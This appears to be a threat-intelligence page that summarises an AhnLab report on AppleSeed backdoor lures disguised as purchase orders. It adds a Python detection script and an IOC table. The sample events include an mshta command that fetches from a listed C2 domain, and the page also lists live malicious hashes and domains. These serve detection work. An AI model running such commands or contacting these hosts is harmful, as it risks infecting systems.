AppleSeed distribution disguised as purchase orders and approval documents

2022-06-30 Ahnlab AppleSeed distribution disguised as purchase orders and approval documents

https://asec.ahnlab.com/ko/35781/


AhnLab observed AppleSeed malware being distributed in files disguised as purchase orders and approval documents; the backdoor is identified as a tool mainly used by the Kimsuky group. The JSE lure drops both an AppleSeed DLL and a decoy purchase-order PDF under %ProgramData%, then uses regsvr32.exe to decode and run the backdoor and mshta.exe to download and execute an additional script. That script collects host, OS, processor, memory, network, routing, port, ARP, process, service, Program Files, Start Menu, and recent-file information and sends it to the C2. The report lists C2 infrastructure including dirwear.000webhostapp.com for information theft and gerter.getenjoyment.net for the AppleSeed backdoor, and warns that the decoy document can hide the infection from the user: the PDF that opens is exactly what the victim expected to see, so the script host, regsvr32.exe and mshta.exe activity behind it is the only visible trace.
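The chain above (script host launching regsvr32.exe on a DLL under %ProgramData%, mshta.exe fetching a remote script, and traffic to the listed C2 domains) maps directly onto process-creation and DNS telemetry. The following is an added detection example written for this page, not code from the ASEC report or from AhnLab: it runs three checks over constructed, Sysmon-shaped event records (the field names, event IDs, the DLL path C:\ProgramData\Example\update.dll and the sample events themselves are assumptions), and matches the IOC hashes and domains listed further down the page.

```python
"""Detection logic for the AppleSeed execution chain described on this page.

Added example, not from the ASEC report. Event records are constructed
dicts with Sysmon-like field names (Image, ParentImage, CommandLine, MD5,
QueryName); real pipelines will need their own field mapping.
"""
import re

# IOCs taken from this page; all four HASH values are 32-hex (MD5-length).
IOC_DOMAINS = {"dirwear.000webhostapp.com", "gerter.getenjoyment.net"}
IOC_HASHES = {
    "ec9dcef04c5c89d6107d23b0668cc1c1",
    "1ae2e46aac55e7f92c72b56b387bc945",
    "7d445b39a090b486aaa002b282b4d8cb",
    "67e7e8600a57e9430a43bf8c5f98c6bd",
}

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}          # what runs a .jse lure
PROGRAMDATA_RE = re.compile(r"(?:%programdata%|[a-z]:\\programdata)\\", re.I)
URL_RE = re.compile(r"https?://([a-z0-9.-]+)", re.I)


def _basename(path):
    """Lower-cased file name of a Windows path (slashes tolerated)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_process(ev):
    """Return alert strings for one process-creation / image-load event."""
    alerts = []
    image = _basename(ev.get("Image", ""))
    parent = _basename(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    md5 = ev.get("MD5", "").lower()

    # Check 1: regsvr32 spawned by a script host, loading from ProgramData.
    if image == "regsvr32.exe" and parent in SCRIPT_HOSTS and PROGRAMDATA_RE.search(cmd):
        alerts.append("regsvr32 loading a DLL from ProgramData, spawned by a script host")

    # Check 2: mshta given a remote URL; escalate if the host is a known C2.
    if image == "mshta.exe":
        m = URL_RE.search(cmd)
        if m:
            host = m.group(1).lower()
            alerts.append(f"mshta fetching remote content from {host}")
            if host in IOC_DOMAINS:
                alerts.append(f"known C2 domain in command line: {host}")

    # Check 3: file hash on the page's IOC list.
    if md5 in IOC_HASHES:
        alerts.append(f"known AppleSeed hash: {md5}")
    return alerts


def check_dns(ev):
    """Return an alert if a DNS query (Sysmon EID 22 style) hits a C2 domain."""
    q = ev.get("QueryName", "").lower().rstrip(".")
    return [f"DNS query for known C2 domain: {q}"] if q in IOC_DOMAINS else []


def scan(events):
    """Run every event through the matching check; return (id, alert) pairs."""
    findings = []
    for ev in events:
        hits = check_dns(ev) if ev.get("EventType") == "dns" else check_process(ev)
        findings.extend((ev.get("Id"), h) for h in hits)
    return findings


# Constructed sample telemetry (not real logs). Paths and the DLL name are
# assumptions; only the domains and the MD5 come from the page's IOC table.
SAMPLE_EVENTS = [
    {"Id": 1, "EventType": "process", "Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'wscript.exe "C:\Users\u\Downloads\order.pdf.jse"'},
    {"Id": 2, "EventType": "process", "Image": r"C:\Windows\System32\regsvr32.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"regsvr32.exe /s C:\ProgramData\Example\update.dll"},
    {"Id": 3, "EventType": "process", "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": "mshta.exe http://dirwear.000webhostapp.com"},
    {"Id": 4, "EventType": "dns", "QueryName": "gerter.getenjoyment.net"},
    {"Id": 5, "EventType": "process", "Image": r"C:\Windows\System32\regsvr32.exe",
     "ParentImage": r"C:\Windows\System32\msiexec.exe",           # benign installer
     "CommandLine": r'regsvr32.exe /s "C:\Program Files\Vendor\lib.dll"'},
    {"Id": 6, "EventType": "load", "Image": r"C:\ProgramData\Example\update.dll",
     "MD5": "EC9DCEF04C5C89D6107D23B0668CC1C1"},
]

if __name__ == "__main__":
    for event_id, alert in scan(SAMPLE_EVENTS):
        print(f"event {event_id}: {alert}")
```

Event 1 (the script host itself) deliberately produces nothing: wscript.exe running a .jse is common enough in enterprise environments that alerting on it alone is noisy, whereas regsvr32.exe or mshta.exe as its child is the signal the report actually describes. Event 5 shows the same regsvr32.exe binary under a normal installer parent and path staying silent.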

Indicators of Compromise

Type    Value                               First Seen   Last Seen
HASH    ec9dcef04c5c89d6107d23b0668cc1c1    2022-06-30   2025-06-09
HASH    1ae2e46aac55e7f92c72b56b387bc945    2022-06-30   2025-06-09
DOMAIN  dirwear.000webhostapp.com           2022-06-30   2025-06-09
HASH    7d445b39a090b486aaa002b282b4d8cb    2022-06-30   2022-06-30
HASH    67e7e8600a57e9430a43bf8c5f98c6bd    2022-06-30   2022-06-30
URL     http://gerter.getenjoyment.net      2022-06-30   2022-06-30
URL     http://dirwear.000webhostapp.com    2022-06-30   2022-06-30
DOMAIN  gerter.getenjoyment.net             2022-06-30   2022-06-30
